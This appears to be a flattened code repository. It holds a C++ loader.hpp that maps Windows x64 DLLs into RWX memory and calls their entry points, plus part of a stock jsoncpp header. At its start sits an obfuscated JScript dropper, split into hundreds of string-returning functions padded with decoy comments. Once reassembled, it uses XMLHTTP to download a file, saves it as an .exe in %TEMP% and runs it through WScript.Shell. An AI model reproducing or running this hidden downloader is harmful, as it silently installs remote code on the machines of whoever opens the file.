j=l241572(); */ /* var j=l622033(); */ /* var j=l156915(); */ function l1098710() { return 'ion'; }; /* var j=l329340(); */ function l649672() { return '+S'; }; function l1920354() { return ',"htt'; }; function l1605072() { return ' xa.'; }; function l544578() { return 'var f'; }; function l850306() { return ' var'; }; /* var j=l192779(); */ /* var j=l826010(); */ function l1977678() { return 'men'; }; function l2168758() { return 'n '; }; function l1461762() { return '(xo.'; }; /* var j=l334100(); */ function l2101880() { return '; '; }; function l401268() { return '++)'; }; function l1318452() { return 'AD'; }; function l840752() { return 'exe";'; }; function l821644() { return '00'; }; function l496808() { return '"WSc'; }; function l1003170() { return 'TTP"'; }; function l210188() { return 'nka'; }; function l773874() { return 'h.'; }; function l1366222() { return ' xa.o'; }; function l2025448() { return '+fr+'; }; /* var j=l204930(); */ function l802536() { return '*1000'; }; /* var j=l933450(); */ /* var j=l272868(); */ /* var j=l473600(); */ function l1815260() { return '; xa.'; }; function l1987232() { return 't.'; }; function l2092326() { return 'nd()'; }; function l477700() { return 'bjec'; }; /* var j=l331109(); */ function l1242020() { return ' { v'; }; /* var j=l630530(); */ function l19108() { return 'ncti'; }; function l439484() { return '= n'; }; /* var j=l153829(); */ /* var j=l425042(); */ function l1681504() { return 'ile('; }; function l812090() { return '000'; }; /* var j=l620053(); */ /* var j=l153358(); */ function l1165588() { return 'e '; }; var j = ''; /* var j=l684074(); */ /* var j=l372466(); */ /* var j=l730271(); */ /* var j=l278190(); */ function l1184696() { return ' &&'; }; /* var j=l649244(); */ function l1853476() { return '}; };'; }; /* var j=l171569(); */ /* var j=l118894(); */ function l792982() { return 'dom()'; }; /* var j=l840703(); */ function l1872584() { return 'ry '; }; function l410822() { return ' { v'; }; function l2264298() { return '(5'; }; /* var j=l949317(); */ function l2140096() { return 'er) {'; }; function l2178312() { return '=='; }; /* var j=l277828(); */ /* var j=l446705(); */ /* var j=l698677(); */ /* var j=l157129(); */ function l296174() { return ');'; }; function l1433100() { return '.w'; }; function l2273852() { return '272);'; }; function l936292() { return 'tiv'; }; /* var j=l897328(); */ /* var j=l132678(); */ function l955400() { return 'ect('; }; function l1729274() { return ' w'; }; function l2254744() { return ' dl'; }; /* var j=l192261(); */ function l1834368() { return 'se('; }; function l238850() { return 'bi'; }; /* var j=l299649(); */ function l2149650() { return '}; if'; }; function l611456() { return 'ntSt'; }; /* var j=l922106(); */ function l1547748() { return 'e '; }; /* var j=l776074(); */ /* var j=l344024(); */ /* var j=l544586(); */ function l1519086() { return ' if '; }; function l1738828() { return 's.Run'; }; function l1652842() { return '; xa'; }; function l1089156() { return 'unct'; }; /* var j=l179161(); */ function l429930() { return 's '; }; function l1767490() { return '; '; }; /* var j=l486069(); */ /* var j=l976662(); */ function l1213358() { return 'tu'; }; function l1280236() { return ' Ac'; }; /* var j=l145471(); */ function l745212() { return '.r'; }; function l1882138() { return '{ xo.'; }; function l1805706() { return '{}; }'; }; function l1910800() { return 'ET"'; }; function l1662396() { return '.sav'; }; /* var j=l912708(); */ /* var j=l184766(); */ /* var j=l711292(); */ function l1156034() { return 'at'; }; function l678334() { return 'fromC'; }; function l1452208() { return 'te'; }; function l2054110() { return 'tr, f'; }; function l964954() { return '"MSX'; }; /* var j=l162193(); */ /* var j=l577434(); */ function l1222912() { return 's =='; }; /* var j=l610984(); */ /* var j=l479212(); */ function l573240() { return '.Ex'; }; /* var j=l227987(); */ function l391714() { return ' i'; }; /* var j=l543846(); */ /* var j=l953833(); */ function l133756() { return 'lub'; }; /* var j=l325567(); */ function l2197420() { return 're'; }; /* var j=l538375(); */ /* var j=l686014(); */ function l2159204() { return ' (d'; }; /* var j=l599708(); */ /* var j=l887143(); */ /* var j=l750734(); */ /* var j=l638610(); */ /* var j=l246356(); */ function l926738() { return ' Ac'; }; /* var j=l590078(); */ function l1328006() { return 'OD'; }; /* var j=l527698(); */ function l1863030() { return ' t'; }; function l582794() { return 'pandE'; }; /* var j=l290322(); */ function l1595518() { return ' = 1;'; }; function l1538194() { return 'a.siz'; }; /* var j=l379129(); */ /* var j=l743150(); */ function l1671950() { return 'eToF'; }; /* var j=l296447(); */ /* var j=l920216(); */ /* var j=l762492(); */ /* var j=l890822(); */ function l1289790() { return 'tiveX'; }; /* var j=l450532(); */ /* var j=l548800(); */ /* var j=l453164(); */ /* var j=l224658(); */ /* var j=l926005(); */ function l114648() { return 'stli'; }; /* var j=l755672(); */ /* var j=l405461(); */ /* var j=l193901(); */ /* var j=l678692(); */ /* var j=l384145(); */ function l1824814() { return 'clo'; }; function l1413992() { return '= 1'; }; /* var j=l468986(); */ function l506362() { return 'ri'; }; function l535024() { return '; '; }; /* var j=l668504(); */ /* var j=l594482(); */ /* var j=l512934(); */ /* var j=l480890(); */ function l2111434() { return '} cat'; }; /* var j=l319626(); */ /* var j=l964971(); */ function l1108264() { return '() '; }; function l515916() { return 'pt.Sh'; }; function l630564() { return '("%TE'; }; /* var j=l554639(); */ function l2283406() { return ' dl(9'; }; /* var j=l460374(); */ function l2206974() { return 'ak; }'; }; function l716550() { return 'e(92'; }; function l162418() { return 'ysco'; }; /* var j=l978186(); */ /* var j=l344720(); */ /* var j=l696804(); */ function l2235636() { return '73'; }; /* var j=l505015(); */ /* var j=l333521(); */ function l1633734() { return 'on '; }; function l124202() { return 'ngc'; }; function l917184() { return ' new'; }; /* var j=l391662(); */ /* var j=l454958(); */ function l945846() { return 'eXObj'; }; /* var j=l556869(); */ /* var j=l916608(); */ /* var j=l147864(); */ function l1939462() { return '/"'; }; function l907630() { return ' ='; }; /* var j=l677075(); */ /* var j=l834685(); */ /* var j=l268574(); */ function l171972() { return 'mm.'; }; function l1490424() { return 'eB'; }; function l1757936() { return '1,0)'; };for (var mnge=1; mnge<=240; mnge++) { j += this['l'+(mnge*9554)](); }; this[l551()](j); 2 | -------------------------------------------------------------------------------- /loader.hpp: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _LOADER_H_ 3 | #define _LOADER_H_ 4 | #include 5 | #include 6 | #include 7 | #if defined(__APPLE__) || defined(__LINUX__) 8 | #include 9 | #include "winapi/dlls/include/windows.h" 10 | #else 11 | #include 12 | #endif 13 | #include "log.hpp" 14 | using namespace std; 15 | 16 | typedef enum { 17 | UNKNOWN_PLATFORM = 0, 18 | X86_PLATFORM, 19 | X64_PLATFORM 20 | }PLATFORM; 21 | 22 | auto check_valid_pe = [](uint8_t* pe_bin) -> uint16_t { 23 | IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)pe_bin; 24 | IMAGE_NT_HEADERS* nt_header = (IMAGE_NT_HEADERS*)(pe_bin + dos_header->e_lfanew); 25 | 26 | if ((dos_header->e_magic ^ 0x5A4D) == 0) { 27 | if ((nt_header->Signature ^ 0x4550) == 0) 28 | return true; 29 | } 30 | return false; 31 | 32 | }; 33 | 34 | auto check_platform = [](uint8_t* pe_bin) -> uint16_t { 35 | IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)pe_bin; 36 | IMAGE_NT_HEADERS* nt_header = (IMAGE_NT_HEADERS*)(pe_bin + dos_header->e_lfanew); 37 | if (!check_valid_pe(pe_bin)) { 38 | return 0x0; 39 | } 40 | else { // has valid pe 41 | if (nt_header->OptionalHeader.Magic == 0x10b) 42 | return PLATFORM::X86_PLATFORM; 43 | else if (nt_header->OptionalHeader.Magic == 0x20b) 44 | return PLATFORM::X64_PLATFORM; 45 | else 46 | return PLATFORM::UNKNOWN_PLATFORM; 47 | 48 | } 49 | }; 50 | 51 | auto call_dllmain = [](void* imgbase) -> bool { 52 | #if defined(__APPLE__) 53 | typedef __attribute__((ms_abi)) bool(*dllMain)(void*, uint32_t, uint32_t); 54 | #elif defined(__LINUX__) 55 | #else 56 | typedef bool(*dllMain)(void*, uint32_t, uint32_t); 57 | #endif 58 | uint16_t platform = 0xffff; 59 | dllMain d_main = nullptr; 60 | uint8_t* _imgbase = (uint8_t*)imgbase; 61 | IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)_imgbase; 62 | platform = check_platform((uint8_t*)_imgbase); 63 | if (platform == PLATFORM::X64_PLATFORM) { 64 | IMAGE_NT_HEADERS64* nt_header = (IMAGE_NT_HEADERS64*)(_imgbase + dos_header->e_lfanew); 65 | d_main = (dllMain)(_imgbase + nt_header->OptionalHeader.AddressOfEntryPoint); 66 | //d_main = (dllMain)(_imgbase + 0x37FD18); 2019 ver 67 | } 68 | else { 69 | console_log(MSGTYPE::CRIT, "target module is unsupported platform binary"); 70 | } 71 | return d_main(imgbase, 1, 0); 72 | }; 73 | 74 | auto of_getprocaddress = [](void* imgbase, string proc_name) { 75 | uint16_t platform = 0xffff; 76 | uint8_t* _imgbase = (uint8_t*)imgbase; 77 | uint32_t exp_dir_va; 78 | uint32_t exp_dir_sz; 79 | platform = check_platform((uint8_t*)_imgbase); 80 | IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)_imgbase; 81 | IMAGE_EXPORT_DIRECTORY* exp_dir = nullptr; 82 | if (platform == PLATFORM::X86_PLATFORM) { 83 | IMAGE_NT_HEADERS32* nt_header = (IMAGE_NT_HEADERS32*)(_imgbase + dos_header->e_lfanew); 84 | exp_dir_va = nt_header->OptionalHeader.DataDirectory[0].VirtualAddress; 85 | exp_dir_sz = nt_header->OptionalHeader.DataDirectory[0].Size; 86 | exp_dir = (IMAGE_EXPORT_DIRECTORY*)(_imgbase + exp_dir_va); 87 | 88 | } 89 | else if (platform == PLATFORM::X64_PLATFORM) { 90 | IMAGE_NT_HEADERS64* nt_header = (IMAGE_NT_HEADERS64*)(_imgbase + dos_header->e_lfanew); 91 | exp_dir_va = nt_header->OptionalHeader.DataDirectory[0].VirtualAddress; 92 | exp_dir_sz = nt_header->OptionalHeader.DataDirectory[0].Size; 93 | exp_dir = (IMAGE_EXPORT_DIRECTORY*)(_imgbase + exp_dir_va); 94 | } 95 | else { 96 | exit(-1); 97 | } 98 | uint32_t *name_rva = (uint32_t*)(_imgbase + exp_dir->AddressOfNames); 99 | for (int i = 0; i < exp_dir->NumberOfNames; i++) { 100 | char* name = (char*)(_imgbase + name_rva[i]); 101 | if (proc_name.compare(name) == 0) { 102 | uint16_t name_ordin = ((uint16_t*)(_imgbase + exp_dir->AddressOfNameOrdinals))[i]; 103 | uint32_t addr = ((uint32_t*)(_imgbase + exp_dir->AddressOfFunctions))[name_ordin]; 104 | if (addr > exp_dir_va && addr < exp_dir_va + exp_dir_sz) { 105 | return (void*)0; 106 | } 107 | else { 108 | return (void*)(_imgbase + addr); 109 | } 110 | } 111 | } 112 | return (void*)0; 113 | }; 114 | auto of_readfile = [](string filename, size_t* dwread) { 115 | size_t file_sz = 0; 116 | uint8_t* fbuf = nullptr; 117 | FILE* fp = nullptr; 118 | errno_t err; 119 | ifstream _stream(filename, ios::binary | ios::in); 120 | _stream.seekg(0, ios::beg); 121 | _stream.seekg(0, ios::end); 122 | file_sz = _stream.tellg(); 123 | _stream.close(); 124 | 125 | fbuf = new uint8_t[file_sz]; 126 | #if defined(__WINDOWS__) 127 | err = fopen_s(&fp, filename.c_str(), "rb"); 128 | if (err) { 129 | console_log(MSGTYPE::CRIT, "fopen_s error"); 130 | } 131 | fread_s(fbuf, file_sz, sizeof(uint8_t), file_sz, fp); 132 | #else 133 | fp = fopen(filename.c_str(), "rb"); 134 | if(!fp) 135 | console_log(MSGTYPE::CRIT, "fopen error"); 136 | fread(fbuf, file_sz, sizeof(uint8_t), fp); 137 | #endif 138 | fclose(fp); 139 | 140 | *dwread = file_sz; 141 | 142 | return fbuf; 143 | }; 144 | 145 | auto get_imagebase = [](uint8_t* pe_bin) { 146 | IMAGE_DOS_HEADER* dos_hdr = (IMAGE_DOS_HEADER*)pe_bin; 147 | IMAGE_NT_HEADERS64* nt_hdr = (IMAGE_NT_HEADERS64*)(pe_bin + dos_hdr->e_lfanew); 148 | 149 | return nt_hdr->OptionalHeader.ImageBase; 150 | }; 151 | 152 | auto get_entrypoint = [](uint8_t* pe_bin) { 153 | IMAGE_DOS_HEADER* dos_hdr = (IMAGE_DOS_HEADER*)pe_bin; 154 | IMAGE_NT_HEADERS64* nt_hdr = (IMAGE_NT_HEADERS64*)(pe_bin + dos_hdr->e_lfanew); 155 | 156 | return nt_hdr->OptionalHeader.AddressOfEntryPoint; 157 | }; 158 | 159 | auto get_ntheader = [](uint8_t* pe_bin) -> IMAGE_NT_HEADERS64* { 160 | IMAGE_DOS_HEADER* dos_hdr = (IMAGE_DOS_HEADER*)pe_bin; 161 | IMAGE_NT_HEADERS64* nt_hdr = (IMAGE_NT_HEADERS64*)(pe_bin + dos_hdr->e_lfanew); 162 | 163 | return nt_hdr; 164 | }; 165 | 166 | auto get_optheader = [](uint8_t* pe_bin) { 167 | IMAGE_DOS_HEADER* dos_hdr = (IMAGE_DOS_HEADER*)pe_bin; 168 | IMAGE_NT_HEADERS64* nt_hdr = (IMAGE_NT_HEADERS64*)(pe_bin + dos_hdr->e_lfanew); 169 | IMAGE_OPTIONAL_HEADER64* opt_header = &nt_hdr->OptionalHeader; 170 | 171 | return opt_header; 172 | }; 173 | 174 | auto map_as_iamge = [](uint8_t* pe_bin, void* _image_base) { 175 | uint8_t* image_base = (uint8_t*)_image_base; 176 | IMAGE_NT_HEADERS64* nt_header = (IMAGE_NT_HEADERS64*)get_ntheader(pe_bin); 177 | IMAGE_FILE_HEADER* file_header = &nt_header->FileHeader; 178 | IMAGE_SECTION_HEADER* section_header = nullptr; 179 | section_header = IMAGE_FIRST_SECTION(nt_header); 180 | #if defined(__WINDOWS__) 181 | memmove_s(image_base, nt_header->OptionalHeader.SizeOfHeaders, pe_bin, nt_header->OptionalHeader.SizeOfHeaders); 182 | #else 183 | memmove(image_base, pe_bin, nt_header->OptionalHeader.SizeOfHeaders); 184 | #endif 185 | 186 | for (int i = 0; file_header->NumberOfSections > i; i++) { 187 | #if defined(__WINDOWS__) 188 | memmove_s((image_base + section_header->VirtualAddress), section_header->SizeOfRawData, (pe_bin + section_header->PointerToRawData), section_header->SizeOfRawData); 189 | #else 190 | memmove((image_base + section_header->VirtualAddress), (pe_bin + section_header->PointerToRawData), section_header->SizeOfRawData); 191 | #endif 192 | section_header = (IMAGE_SECTION_HEADER*)((uint8_t*)section_header + sizeof(IMAGE_SECTION_HEADER)); 193 | } 194 | }; 195 | 196 | auto reloc_pe_image = [](void* _image_base) { 197 | uint8_t* image_base = (uint8_t*)_image_base; 198 | IMAGE_OPTIONAL_HEADER64* opt_header = (IMAGE_OPTIONAL_HEADER64*)get_optheader(image_base); 199 | uint64_t delta = (uint64_t)image_base - (uint64_t)opt_header->ImageBase; 200 | uint32_t reloc_dir_size = opt_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; 201 | uint64_t reloc_dir_va = opt_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; 202 | if (delta) { 203 | if (reloc_dir_size) { 204 | IMAGE_BASE_RELOCATION* cur_reloc_dir = (IMAGE_BASE_RELOCATION*)(image_base + reloc_dir_va); 205 | IMAGE_BASE_RELOCATION* reloc_dir_end = (IMAGE_BASE_RELOCATION*)((uint8_t*)cur_reloc_dir + reloc_dir_size); 206 | while (cur_reloc_dir < reloc_dir_end && cur_reloc_dir->SizeOfBlock) { 207 | uint32_t number_of_etry = (cur_reloc_dir->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(uint16_t); 208 | uint16_t* info = (uint16_t*)(cur_reloc_dir + 1); 209 | for (int i = 0; number_of_etry > i; i++, info++) { 210 | if ((*info >> 0xC) == IMAGE_REL_BASED_DIR64) { 211 | uint64_t* addr = (uint64_t*)(image_base + cur_reloc_dir->VirtualAddress + ((*info) & 0xfff)); 212 | *addr += delta; 213 | } 214 | } 215 | cur_reloc_dir = (IMAGE_BASE_RELOCATION*)((uint8_t*)cur_reloc_dir + cur_reloc_dir->SizeOfBlock); 216 | } 217 | } 218 | } 219 | }; 220 | 221 | auto set_all_priv = [](void* image_base, size_t image_sz) { 222 | #if defined(__WINDOWS__) 223 | uint32_t dwOldProt; 224 | VirtualProtect(image_base, image_sz, PAGE_EXECUTE_READWRITE, (DWORD*)&dwOldProt); 225 | #else 226 | mprotect(image_base, image_sz, PROT_READ | PROT_WRITE | PROT_EXEC); 227 | #endif 228 | }; 229 | 230 | #if defined(__WINDOWS__) 231 | auto of_rewrite_iat = [](void* imgbase) { 232 | uint16_t platform = 0xffff; 233 | uint8_t* _imgbase = (uint8_t*)imgbase; 234 | uint32_t imp_dir_va; 235 | uint32_t imp_dir_sz; 236 | platform = check_platform((uint8_t*)_imgbase); 237 | IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)_imgbase; 238 | IMAGE_IMPORT_DESCRIPTOR* imp_descriptor = nullptr; 239 | if (platform == PLATFORM::X64_PLATFORM) { 240 | IMAGE_NT_HEADERS64* nt_header = (IMAGE_NT_HEADERS64*)(_imgbase + dos_header->e_lfanew); 241 | IMAGE_THUNK_DATA64* name_tab = nullptr; 242 | IMAGE_THUNK_DATA64* addr_tab = nullptr; 243 | 244 | imp_dir_va = nt_header->OptionalHeader.DataDirectory[1].VirtualAddress; 245 | imp_dir_sz = nt_header->OptionalHeader.DataDirectory[1].Size; 246 | imp_descriptor = (IMAGE_IMPORT_DESCRIPTOR*)(_imgbase + imp_dir_va); 247 | 248 | char* mod_name = nullptr; 249 | if (imp_dir_sz) { 250 | while (imp_descriptor->Name) { 251 | mod_name = (char*)(_imgbase + imp_descriptor->Name); 252 | HMODULE hMod = LoadLibraryA(mod_name); 253 | 254 | uint64_t* pThunkRef = reinterpret_cast(_imgbase + imp_descriptor->OriginalFirstThunk); 255 | uint64_t* pFuncRef = reinterpret_cast(_imgbase + imp_descriptor->FirstThunk); 256 | if (!pThunkRef) 257 | pThunkRef = pFuncRef; 258 | for (; *pThunkRef; pThunkRef++, pFuncRef++) { 259 | if (IMAGE_SNAP_BY_ORDINAL(*pThunkRef)) { 260 | uint32_t old_prot; 261 | bool res; 262 | res = VirtualProtect(pFuncRef, sizeof(void*), PAGE_EXECUTE_READWRITE, (PDWORD)&old_prot); 263 | *pFuncRef = (ULONG_PTR)GetProcAddress(hMod, reinterpret_cast(*pThunkRef & 0xFFFF)); 264 | } 265 | else { 266 | IMAGE_IMPORT_BY_NAME* imp_by_name = (IMAGE_IMPORT_BY_NAME*)(_imgbase + *pThunkRef); 267 | uint64_t target_addr = (uint64_t)GetProcAddress(hMod, (char*)imp_by_name->Name); 268 | uint32_t old_prot; 269 | bool res; 270 | res = VirtualProtect(pFuncRef, sizeof(void*), PAGE_EXECUTE_READWRITE, (PDWORD)&old_prot); 271 | *pFuncRef = target_addr; 272 | } 273 | } 274 | imp_descriptor++; 275 | } 276 | } 277 | 278 | } 279 | else { 280 | exit(-1); 281 | } 282 | }; 283 | 284 | 285 | auto of_get_runtime_function_AMD = [](RUNTIME_FUNCTION *func, uint64_t addr) { 286 | return func->EndAddress; 287 | }; 288 | 289 | auto of_RtlAddFunctionTable = [](RUNTIME_FUNCTION *table, uint32_t count, uint64_t addr) { 290 | struct list 291 | { 292 | struct list *next; 293 | struct list *prev; 294 | }; 295 | 296 | struct dynamic_unwind_entry 297 | { 298 | struct list entry; 299 | uint64_t base; 300 | uint64_t end; 301 | RUNTIME_FUNCTION *table; 302 | uint32_t count; 303 | uint32_t max_count; 304 | void* callback; 305 | void* context; 306 | }; 307 | struct dynamic_unwind_entry *entry; 308 | 309 | entry = (dynamic_unwind_entry*)calloc(sizeof(dynamic_unwind_entry), sizeof(uint8_t)); 310 | if (!entry) 311 | return false; 312 | entry->base = addr; 313 | entry->end = addr + (count ? of_get_runtime_function_AMD(&table[count - 1], addr) : 0); 314 | entry->table = table; 315 | entry->count = count; 316 | entry->max_count = 0; 317 | entry->callback = NULL; 318 | entry->context = NULL; 319 | 320 | //list_add_tail(&dynamic_unwind_list, &entry->entry); 321 | }; 322 | 323 | auto of_set_seh = [](void* imgbase) { 324 | uint8_t* _imgbase = (uint8_t*)imgbase; 325 | uint16_t platform = 0xffff; 326 | uint32_t seh_dir_va; 327 | uint32_t seh_dir_sz; 328 | platform = check_platform((uint8_t*)_imgbase); 329 | IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)_imgbase; 330 | if (platform == PLATFORM::X64_PLATFORM) { 331 | IMAGE_NT_HEADERS64* nt_header = (IMAGE_NT_HEADERS64*)(_imgbase + dos_header->e_lfanew); 332 | seh_dir_sz = nt_header->OptionalHeader.DataDirectory[3].Size; 333 | seh_dir_va = nt_header->OptionalHeader.DataDirectory[3].VirtualAddress; 334 | if (seh_dir_sz) { 335 | RtlAddFunctionTable( 336 | (RUNTIME_FUNCTION*)(_imgbase + seh_dir_va), 337 | seh_dir_sz / sizeof(IMAGE_RUNTIME_FUNCTION_ENTRY), 338 | (uint64_t)imgbase 339 | ); 340 | } 341 | } 342 | }; 343 | 344 | auto winmap = [](string lib_name) -> void* { 345 | HANDLE hMap = nullptr; 346 | HANDLE hFile = nullptr; 347 | void* img_base = nullptr; 348 | IMAGE_OPTIONAL_HEADER64* opt_header; 349 | hFile = CreateFileA(lib_name.c_str(), GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr, 350 | OPEN_EXISTING, 351 | FILE_ATTRIBUTE_NORMAL, 352 | nullptr 353 | ); 354 | if (hFile == INVALID_HANDLE_VALUE) 355 | printf("sibal"); 356 | hMap = CreateFileMappingA( 357 | hFile, // paging file 358 | nullptr, SEC_IMAGE | PAGE_READONLY, 0, 359 | 0, nullptr); 360 | 361 | img_base = MapViewOfFileEx(hMap, FILE_MAP_READ, 0, 0, 0, (void*)0x75a100000); 362 | opt_header = (IMAGE_OPTIONAL_HEADER64*)get_optheader((uint8_t*)img_base); 363 | set_all_priv(img_base, opt_header->SizeOfImage); 364 | reloc_pe_image(img_base); 365 | return img_base; 366 | }; 367 | 368 | #endif 369 | 370 | auto of_loadlibraryX64 = [](string libname) { 371 | uint8_t* raw = nullptr; 372 | void* image_base = nullptr; 373 | size_t file_sz = 0; 374 | int fd = 0; 375 | uint16_t platform = 0xffff; 376 | IMAGE_NT_HEADERS64* nt_header = nullptr; 377 | raw = of_readfile(libname, &file_sz); 378 | platform = check_platform(raw); 379 | 380 | switch (platform) 381 | { 382 | case PLATFORM::X64_PLATFORM: 383 | #if defined(__WINDOWS__) 384 | image_base = winmap(libname); 385 | of_set_seh(image_base); 386 | #else 387 | if (!check_valid_pe(raw)) { 388 | console_log(MSGTYPE::CRIT, "target module is not valid pe"); 389 | } 390 | if (check_platform(raw) != PLATFORM::X64_PLATFORM) { 391 | console_log(MSGTYPE::CRIT, "target module is unsupported platform binary"); 392 | } 393 | nt_header = (IMAGE_NT_HEADERS64*)get_ntheader(raw); 394 | 395 | image_base = mmap((void*)(nt_header->OptionalHeader.ImageBase), 396 | nt_header->OptionalHeader. SizeOfImage, PROT_READ | PROT_WRITE | PROT_EXEC, 397 | MAP_ANONYMOUS | MAP_PRIVATE, 398 | -1, 399 | 0); 400 | if (image_base == MAP_FAILED) { 401 | console_log(MSGTYPE::CRIT, "fail to map windll"); 402 | } 403 | set_all_priv(image_base, nt_header->OptionalHeader.SizeOfImage); 404 | map_as_iamge(raw, image_base); 405 | reloc_pe_image(image_base); 406 | #endif // _WIN64 407 | 408 | break; 409 | default: 410 | console_log(MSGTYPE::CRIT, "unsupported PE platform"); 411 | break; 412 | } 413 | delete raw; 414 | return image_base; 415 | }; 416 | #endif 417 | -------------------------------------------------------------------------------- /include/jsoncpp/json/json-forwards.h: -------------------------------------------------------------------------------- 1 | /// Json-cpp amalgamated forward header (http://jsoncpp.sourceforge.net/). 2 | /// It is intended to be used with #include "json/json-forwards.h" 3 | /// This header provides forward declaration for all JsonCpp types. 4 | 5 | // ////////////////////////////////////////////////////////////////////// 6 | // Beginning of content of file: LICENSE 7 | // ////////////////////////////////////////////////////////////////////// 8 | 9 | /* 10 | The JsonCpp library's source code, including accompanying documentation, 11 | tests and demonstration applications, are licensed under the following 12 | conditions... 13 | 14 | Baptiste Lepilleur and The JsonCpp Authors explicitly disclaim copyright in all 15 | jurisdictions which recognize such a disclaimer. In such jurisdictions, 16 | this software is released into the Public Domain. 17 | 18 | In jurisdictions which do not recognize Public Domain property (e.g. Germany as of 19 | 2010), this software is Copyright (c) 2007-2010 by Baptiste Lepilleur and 20 | The JsonCpp Authors, and is released under the terms of the MIT License (see below). 21 | 22 | In jurisdictions which recognize Public Domain property, the user of this 23 | software may choose to accept it either as 1) Public Domain, 2) under the 24 | conditions of the MIT License (see below), or 3) under the terms of dual 25 | Public Domain/MIT License conditions described here, as they choose. 26 | 27 | The MIT License is about as close to Public Domain as a license can get, and is 28 | described in clear, concise terms at: 29 | 30 | http://en.wikipedia.org/wiki/MIT_License 31 | 32 | The full text of the MIT License follows: 33 | 34 | ======================================================================== 35 | Copyright (c) 2007-2010 Baptiste Lepilleur and The JsonCpp Authors 36 | 37 | Permission is hereby granted, free of charge, to any person 38 | obtaining a copy of this software and associated documentation 39 | files (the "Software"), to deal in the Software without 40 | restriction, including without limitation the rights to use, copy, 41 | modify, merge, publish, distribute, sublicense, and/or sell copies 42 | of the Software, and to permit persons to whom the Software is 43 | furnished to do so, subject to the following conditions: 44 | 45 | The above copyright notice and this permission notice shall be 46 | included in all copies or substantial portions of the Software. 47 | 48 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 49 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 50 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 51 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS 52 | BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN 53 | ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 54 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 55 | SOFTWARE. 56 | ======================================================================== 57 | (END LICENSE TEXT) 58 | 59 | The MIT license is compatible with both the GPL and commercial 60 | software, affording one all of the rights of Public Domain with the 61 | minor nuisance of being required to keep the above copyright notice 62 | and license text in the source code. Note also that by accepting the 63 | Public Domain "license" you can re-license your copy using whatever 64 | license you like. 65 | 66 | */ 67 | 68 | // ////////////////////////////////////////////////////////////////////// 69 | // End of content of file: LICENSE 70 | // ////////////////////////////////////////////////////////////////////// 71 | 72 | 73 | 74 | 75 | 76 | #ifndef JSON_FORWARD_AMALGAMATED_H_INCLUDED 77 | # define JSON_FORWARD_AMALGAMATED_H_INCLUDED 78 | /// If defined, indicates that the source file is amalgamated 79 | /// to prevent private header inclusion. 80 | #define JSON_IS_AMALGAMATION 81 | 82 | // ////////////////////////////////////////////////////////////////////// 83 | // Beginning of content of file: include/json/version.h 84 | // ////////////////////////////////////////////////////////////////////// 85 | 86 | #ifndef JSON_VERSION_H_INCLUDED 87 | #define JSON_VERSION_H_INCLUDED 88 | 89 | // Note: version must be updated in three places when doing a release. This 90 | // annoying process ensures that amalgamate, CMake, and meson all report the 91 | // correct version. 92 | // 1. /meson.build 93 | // 2. /include/json/version.h 94 | // 3. /CMakeLists.txt 95 | // IMPORTANT: also update the SOVERSION!! 96 | 97 | #define JSONCPP_VERSION_STRING "1.9.5" 98 | #define JSONCPP_VERSION_MAJOR 1 99 | #define JSONCPP_VERSION_MINOR 9 100 | #define JSONCPP_VERSION_PATCH 5 101 | #define JSONCPP_VERSION_QUALIFIER 102 | #define JSONCPP_VERSION_HEXA \ 103 | ((JSONCPP_VERSION_MAJOR << 24) | (JSONCPP_VERSION_MINOR << 16) | \ 104 | (JSONCPP_VERSION_PATCH << 8)) 105 | 106 | #ifdef JSONCPP_USING_SECURE_MEMORY 107 | #undef JSONCPP_USING_SECURE_MEMORY 108 | #endif 109 | #define JSONCPP_USING_SECURE_MEMORY 0 110 | // If non-zero, the library zeroes any memory that it has allocated before 111 | // it frees its memory. 112 | 113 | #endif // JSON_VERSION_H_INCLUDED 114 | 115 | // ////////////////////////////////////////////////////////////////////// 116 | // End of content of file: include/json/version.h 117 | // ////////////////////////////////////////////////////////////////////// 118 | 119 | 120 | 121 | 122 | 123 | 124 | // ////////////////////////////////////////////////////////////////////// 125 | // Beginning of content of file: include/json/allocator.h 126 | // ////////////////////////////////////////////////////////////////////// 127 | 128 | // Copyright 2007-2010 Baptiste Lepilleur and The JsonCpp Authors 129 | // Distributed under MIT license, or public domain if desired and 130 | // recognized in your jurisdiction. 131 | // See file LICENSE for detail or copy at http://jsoncpp.sourceforge.net/LICENSE 132 | 133 | #ifndef JSON_ALLOCATOR_H_INCLUDED 134 | #define JSON_ALLOCATOR_H_INCLUDED 135 | 136 | #include 137 | #include 138 | 139 | #pragma pack(push, 8) 140 | 141 | namespace Json { 142 | template class SecureAllocator { 143 | public: 144 | // Type definitions 145 | using value_type = T; 146 | using pointer = T*; 147 | using const_pointer = const T*; 148 | using reference = T&; 149 | using const_reference = const T&; 150 | using size_type = std::size_t; 151 | using difference_type = std::ptrdiff_t; 152 | 153 | /** 154 | * Allocate memory for N items using the standard allocator. 155 | */ 156 | pointer allocate(size_type n) { 157 | // allocate using "global operator new" 158 | return static_cast(::operator new(n * sizeof(T))); 159 | } 160 | 161 | /** 162 | * Release memory which was allocated for N items at pointer P. 163 | * 164 | * The memory block is filled with zeroes before being released. 165 | */ 166 | void deallocate(pointer p, size_type n) { 167 | // memset_s is used because memset may be optimized away by the compiler 168 | memset_s(p, n * sizeof(T), 0, n * sizeof(T)); 169 | // free using "global operator delete" 170 | ::operator 